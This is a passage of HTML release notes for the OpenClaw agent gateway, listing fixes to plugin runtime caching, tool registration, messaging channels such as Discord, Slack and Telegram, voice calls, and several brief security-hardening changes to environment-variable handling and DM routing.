<p>Agents/runtime: delegate scoped reply runtime registry reuse to the plugin loader cache-key compatibility checks, so config changes with the same startup plugin ids cannot keep stale runtime hooks or tools active. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/runtime: let compatible wider plugin registries satisfy scoped reply runtime requests when they already contain the requested plugins, avoiding redundant runtime loading without bypassing loader cache-key freshness checks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/runtime: validate agent model allowlists against manifest model catalog metadata during reply startup, avoiding broad provider runtime catalog loading before the agent run lane starts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/runtime: keep allowlisted configured model thinking metadata available when manifest catalog rows are absent, so explicit high-reasoning levels remain valid for custom configured models. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: preserve plugin-declared config-only generation providers such as local Comfy workflows during reply tool pre-gating, and share manifest auth/config availability checks between the planner and final tool factories. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: keep Comfy generation tools visible from legacy local workflow config and cloud API-key config when no Gateway metadata snapshot is active, using plugin-declared manifest signals instead of loading provider runtimes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: route media and generation capability lookups through the Gateway plugin metadata snapshot during reply tool registration, avoiding repeated manifest registry reloads on the live reply path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: let plugins declare media generation auth aliases and base-url guards in manifests, preserving OpenAI Codex OAuth image generation availability without core-owned provider special cases. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: reuse the auth profile store already loaded for the active run when deciding media and generation tool availability, avoiding repeated provider-auth runtime discovery during reply startup. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: keep image, video, and music generation tool registration on manifest/auth control-plane checks instead of loading runtime provider registries during reply startup, reducing live-path tool-prep blocking while leaving provider runtime resolution for execution and list actions. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Discord: document canonical mention formatting in agent prompt hints and channel docs so outbound replies use <code>&lt;@USER_ID&gt;</code>, <code>&lt;#CHANNEL_ID&gt;</code>, and <code>&lt;@&amp;ROLE_ID&gt;</code> instead of legacy nickname mentions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359907332" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75173" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75173/hovercard" href="https://github.com/openclaw/openclaw/pull/75173">#75173</a>)</p>
</li>
<li>
<p>Heartbeat scheduler: gate exec-event/notification/spawn/retry wakes through a centralized cooldown so backgrounded <code>process.start</code> exit notifications can no longer self-feed runaway heartbeat runs (configured <code>every: "30m"</code> was firing every ~10s in production, pegging the gateway event loop with <code>eventLoopDelayMaxMs &gt;6s</code> spikes that stalled control-UI asset serving and TUI handshakes). Documented wake-now paths (<code>manual</code>, <code>wake</code>, task completion, blocked-task follow-up, <code>/hooks/wake mode=now</code>, and cron <code>--wake now</code>) remain immediate; retryable busy skips no longer poison the cooldown for the next retry; per-agent flood guard caps any unexpected feedback loop at 5 runs/60s. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4236016269" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64016" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64016/hovercard" href="https://github.com/openclaw/openclaw/issues/64016">#64016</a>, refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3946045245" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/17797" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/17797/hovercard" href="https://github.com/openclaw/openclaw/issues/17797">#17797</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362911805" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75436" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75436/hovercard" href="https://github.com/openclaw/openclaw/issues/75436">#75436</a>) Thanks @hexsprite.</p>
</li>
<li>
<p>fix: block workspace CLOUDSDK_PYTHON override and always set trusted interpreter for gcloud. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352375218" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74492" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74492/hovercard" href="https://github.com/openclaw/openclaw/pull/74492">#74492</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</p>
</li>
<li>
<p>Providers/Z.AI: move the bundled GLM catalog and auth env metadata into the plugin manifest, so <code>models list --all --provider zai</code> shows the full known catalog without duplicated runtime seed data. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Providers/Qianfan and Providers/Stepfun: declare setup auth metadata (<code>api-key</code> method, <code>QIANFAN_API_KEY</code>, <code>STEPFUN_API_KEY</code>) in the plugin manifest so onboarding and <code>models setup</code> surface the expected env var without falling back to legacy <code>providerAuthEnvVars</code> runtime seed data. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>fix(infra): block ambient Homebrew env vars from brew resolution. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351948564" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74463" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74463/hovercard" href="https://github.com/openclaw/openclaw/pull/74463">#74463</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</p>
</li>
<li>
<p>Onboarding/configure: avoid staging every default plugin runtime dependency after config writes, so skipped setup flows only prepare config-selected plugin deps instead of pulling broad feature-plugin packages. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Thinking/providers: resolve bundled provider thinking profiles through lightweight provider policy artifacts when startup-lazy providers are not active, so OpenAI Codex GPT-5.x keeps xhigh available in Gateway session validation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355122984" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74796" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74796/hovercard" href="https://github.com/openclaw/openclaw/issues/74796">#74796</a>. Thanks @maxschachere.</p>
</li>
<li>
<p>Security/Windows: ignore workspace <code>.env</code> system-path variables and resolve stale-process <code>taskkill.exe</code> from the validated Windows install root, preventing repository-local env files from redirecting cleanup helpers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</p>
</li>
<li>
<p>CLI/plugins: refresh persisted plugin registry policy in place for <code>plugins enable</code> and <code>plugins disable</code>, so routine toggles no longer rebuild and hash every plugin source when the target is already indexed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Windows/install: run npm from a writable installer temp directory and pin the Bedrock runtime dependency below a Windows ARM Node 24 npm resolver failure, so global OpenClaw installs no longer fail before onboarding. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>.</p>
</li>
<li>
<p>CLI/plugins: scope install and enable slot selection to the selected plugin manifest/runtime fallback, so plugin installs no longer load every plugin runtime or broad status snapshot just to update memory/context slots. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/TTS: keep bundled speech-provider discovery available on cold package Gateway paths and add bundled plugin matrix runtime probes for health, readiness, RPC, TTS discovery, and post-ready runtime-deps watchdog coverage. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361552521" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75283" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75283/hovercard" href="https://github.com/openclaw/openclaw/issues/75283">#75283</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Google Meet/Twilio: show delegated voice call ID, DTMF, and intro-greeting state in <code>googlemeet doctor</code>, and avoid claiming DTMF was sent when no Meet PIN sequence was configured. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</p>
</li>
<li>
<p>Plugins/tools: prefer built bundled plugin code during tool discovery and skip channel runtime hydration while preserving companion provider registrations, reducing per-run plugin-tool prep cost without dropping executable plugin tools. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361658522" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75290" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75290/hovercard" href="https://github.com/openclaw/openclaw/issues/75290">#75290</a>. Thanks @thanos-openclaw.</p>
</li>
<li>
<p>Plugins/loader: scope plugin-tool registry reuse to the enabled plugin plan and stored Gateway method keys, so embedded runner tool lookup can reuse compatible startup registries without hiding enabled non-startup plugin tools. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363466995" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75520" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75520/hovercard" href="https://github.com/openclaw/openclaw/issues/75520">#75520</a>. Thanks @whtoo.</p>
</li>
<li>
<p>Voice Call/Twilio: send notify-mode initial TwiML directly in the outbound create-call request while keeping conversation and pre-connect DTMF calls webhook-driven, so one-shot notify calls do not depend on a first-answer webhook fetch. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335052780" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72758" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72758/hovercard" href="https://github.com/openclaw/openclaw/pull/72758">#72758</a>. Thanks @tyshepps.</p>
</li>
<li>
<p>Discord/Slack: defer status-reaction cleanup until run finalization so queued, thinking, tool, and terminal reactions no longer flicker during normal progress updates. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363934911" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75582" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75582/hovercard" href="https://github.com/openclaw/openclaw/pull/75582">#75582</a>)</p>
</li>
<li>
<p>Discord/voice: leave Discord voice off for text-only configs unless <code>channels.discord.voice</code> is explicitly configured, avoiding default <code>GuildVoiceStates</code> traffic and idle gateway CPU pressure for bots that do not use <code>/vc</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345485387" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73753" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73753/hovercard" href="https://github.com/openclaw/openclaw/issues/73753">#73753</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347706250" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74044" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74044/hovercard" href="https://github.com/openclaw/openclaw/issues/74044">#74044</a>. Thanks @sanchezm86 and @SecureCloudProjO.</p>
</li>
<li>
<p>Discord/voice: rerun configured voice auto-join after Discord gateway RESUMED events and ignore already-destroyed stale voice connections during reconnect cleanup, so health-monitor account restarts can rejoin configured channels. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4043554548" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40665" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40665/hovercard" href="https://github.com/openclaw/openclaw/issues/40665">#40665</a>. Thanks @liz709.</p>
</li>
<li>
<p>Plugins/CLI: reuse the cold manifest registry while building plugin status and inspect reports, so large configured plugin sets no longer rediscover the bundled/plugin registry once per inspect row. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord/voice: lengthen the default voice join Ready wait, add configurable <code>voice.connectTimeoutMs</code>/<code>voice.reconnectGraceMs</code>, and warn before destroying unrecovered disconnected sessions so slow Discord voice handshakes and reconnects no longer fail silently. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4223830724" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63098" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63098/hovercard" href="https://github.com/openclaw/openclaw/issues/63098">#63098</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041199935" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39825" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39825/hovercard" href="https://github.com/openclaw/openclaw/issues/39825">#39825</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245973986" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65039" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65039/hovercard" href="https://github.com/openclaw/openclaw/issues/65039">#65039</a>. Thanks @darealgege, @kzicherman, and @ayochim.</p>
</li>
<li>
<p>Gateway/health: refresh cached health RPC snapshots when channel runtime state diverges, so Discord and other channel status reads no longer report stale running or connected values until the cache TTL expires. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362790644" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75423" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75423/hovercard" href="https://github.com/openclaw/openclaw/pull/75423">#75423</a>)</p>
</li>
<li>
<p>Gateway/sessions: keep session-store reads from running stale prune and entry-count cap maintenance during startup, so oversized stores no longer block chat history readiness after updates while writes and <code>sessions cleanup --enforce</code> still preserve the cleanup safeguards. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4307434486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70050" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70050/hovercard" href="https://github.com/openclaw/openclaw/issues/70050">#70050</a>. Thanks @tangda18.</p>
</li>
<li>
<p>Security/audit: keep plain <code>security audit</code> on the cold config/filesystem path and reserve plugin runtime security collectors for <code>--deep</code>, so large plugin installs cannot execute every plugin runtime during routine audits. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord/voice: merge configured media-understanding providers such as Deepgram into partial active provider registries, so follow-up voice turns keep transcribing after another media plugin is already active. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251059736" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65687" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65687/hovercard" href="https://github.com/openclaw/openclaw/issues/65687">#65687</a>. Thanks @OneMintJulep.</p>
</li>
<li>
<p>WhatsApp: stage <code>qrcode</code> through root mirrored runtime dependencies so packaged QR pairing can render from staged plugin-runtime-deps installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362623764" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75394" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75394/hovercard" href="https://github.com/openclaw/openclaw/issues/75394">#75394</a>. Thanks @FelipeX2001.</p>
</li>
<li>
<p>Discord/voice: apply per-channel Discord <code>systemPrompt</code> overrides to voice transcript turns by forwarding the trusted channel prompt through the voice agent run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4077930512" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47095" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47095/hovercard" href="https://github.com/openclaw/openclaw/issues/47095">#47095</a>. Thanks @qearlyao.</p>
</li>
<li>
<p>Discord/native commands: send component-only interaction replies from slash command and status handlers instead of treating renderable Discord components as an empty response. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Slack/slash commands: send block-only slash command replies instead of dropping Slack block payloads with no plain-text fallback. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Telegram/messages: derive fallback text from interactive button/select labels before sending button-only payloads, so Telegram replies are not rejected as empty messages. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>LINE/messages: send quick-reply-only payloads with fallback option text instead of accepting the payload and returning an empty delivery. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Auto-reply/docking: require <code>/dock-*</code> route switches to start from direct chats, so group or channel participants cannot reroute a shared session's future replies into a linked DM. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord: keep text-DM main-session route updates pinned to the configured DM owner, matching component interactions so another direct-message sender cannot redirect future main-session replies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Mattermost/Matrix: keep direct-message main-session route updates pinned to the configured DM owner so paired or temporarily allowed senders cannot redirect future shared-session replies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord: keep SecretRef-backed bot tokens discoverable for message actions without resolving the token during schema generation, and resolve scoped channel SecretRefs before outbound agent message sends even when the tool is built from a config snapshot. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362174273" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75324" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75324/hovercard" href="https://github.com/openclaw/openclaw/issues/75324">#75324</a>. Thanks @slideshow-dingo and @Conan-Scott.</p>
</li>
<li>
<p>Updates: run package post-install doctor repair with the managed Gateway service profile and state paths when a daemon is installed, so shell/profile mismatches no longer repair the caller state while the restarted Gateway keeps stale config. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Models/DeepInfra: declare DeepInfra manifest catalog discovery and derive its runtime fallback catalog from the manifest, restoring provider-filtered <code>models list --all --provider deepinfra</code> rows without duplicated static model data. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>CLI/update: verify managed gateway restarts against the installed service port instead of the caller shell port, so package updates do not report a healthy daemon as failed when profiles use different gateway ports. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway/agent: reject strict <code>openclaw agent --deliver</code> requests with missing delivery targets before starting the agent run, so users do not wait for a completed turn that cannot send anywhere. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Setup/import: honor non-interactive <code>--import-from</code> onboarding flags by running the migration import path instead of silently completing normal setup without importing anything. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord/voice: run voice-channel turns under a voice-output policy that hides the agent <code>tts</code> tool and asks for spoken reply text, so <code>/vc join</code> sessions synthesize and play agent replies instead of ending with <code>NO_REPLY</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4208687812" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61536" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61536/hovercard" href="https://github.com/openclaw/openclaw/issues/61536">#61536</a>. Thanks @aounakram.</p>
</li>
<li>
<p>Doctor/plugins: keep plain <code>doctor --non-interactive</code> from installing bundled plugin runtime dependencies, so headless health checks report missing deps while <code>doctor --fix</code> remains the explicit repair path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Doctor/gateway: require an interactive confirmation before installing or rewriting the Gateway service, so <code>doctor --fix --non-interactive</code> can repair plugin/config drift without replacing the operator's launchd/systemd service from a temporary environment. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/runtime-deps: include packaged OpenClaw identity in bundled plugin loader cache keys, so same-path package upgrades stop reusing stale versioned runtime-deps mirrors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357604708" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75045" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75045/hovercard" href="https://github.com/openclaw/openclaw/issues/75045">#75045</a>. Thanks @sahilsatralkar.</p>
</li>
<li>
<p>Plugin SDK: restore reply-prefix and reply-pipeline helpers on the deprecated root/compat SDK surface so external plugins still using <code>openclaw/plugin-sdk</code> do not fail message dispatch after update. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359892122" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75171" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75171/hovercard" href="https://github.com/openclaw/openclaw/issues/75171">#75171</a>. Thanks @zhangxiliang.</p>
</li>
<li>
<p>Plugins/runtime-deps: prune inactive same-package versioned runtime-deps roots after bundled dependency repair, so upgrades do not leave old <code>openclaw-&lt;version&gt;-&lt;hash&gt;</code> package caches behind after doctor runs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/runtime-deps: prune legacy version-scoped plugin runtime-deps roots during bundled dependency repair and cover the path in Package Acceptance's upgrade-survivor matrix, so upgrades from 2026.4.x no longer leave stale per-plugin runtime trees after doctor runs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/runtime-deps: keep Gateway startup plugin imports and runtime plugin fallback loads verify-only after startup/config repair planning, so packaged installs no longer spawn package-manager repair from hot paths after readiness. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361552521" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75283" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75283/hovercard" href="https://github.com/openclaw/openclaw/issues/75283">#75283</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks @brokemac79 and @xiaohuaxi.</p>
</li>
<li>
<p>Plugins/runtime-deps: treat package.json runtime-deps manifests as supersets when generated materialization metadata is absent, so bundled plugin activation stops restaging already-installed dependency subsets on every activation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362879118" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75429" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75429/hovercard" href="https://github.com/openclaw/openclaw/issues/75429">#75429</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362889795" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75431" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75431/hovercard" href="https://github.com/openclaw/openclaw/pull/75431">#75431</a>) Thanks @loyur.</p>
</li>
<li>
